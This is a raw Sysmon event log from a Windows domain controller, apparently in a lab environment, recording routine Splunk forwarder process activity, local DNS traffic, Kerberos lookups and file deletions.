10341000x80000000000000003052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.658{266CAFBE-648A-6064-7900-00000000AE01}46204624C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.471{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.471{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.253{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.496{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local56610- 22542200x80000000000000003078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.440{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000003077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.862{266CAFBE-646C-6064-1200-00000000AE01}1196wpad1460-C:\Windows\System32\svchost.exe 23542300x80000000000000003076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.752{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C2AB49A22A48E50498E27B757A7B9A70,SHA256=F4A63B50B6252CF38A90854BEC388541AF4C4AE969998DED3CC0CF092F4ED456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.565{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D7AB20240FB3E613E3144AAC7472374A,SHA256=492244C49E7BC8680D0F88380236583F4EA2C26EE4AD63AF3C1EE2F353353D05,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.543{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63663- 23542300x80000000000000003073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.533{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=A0D1347F5197F07FD38C7C9ADC5ADAC3,SHA256=6826E84FA24EA127E5D966920462D5D892887FEC0322982BB7B04A7289E5D8C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.533{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=30DE71D3653ED5ED674EBDC03C76CAAC,SHA256=EA461579E702FA7DA4D3C81D6EC2351A069C75B6C11A262BDF169A0B5B8BA1C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.533{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=1F3246F51ECE303275685B0EBB5AC25D,SHA256=6280AF9F133AF58374EA0A9B7927A66E022FA29359E7E57D84605159E44A8682,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.502{266CAFBE-648B-6064-7A00-00000000AE01}46924696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 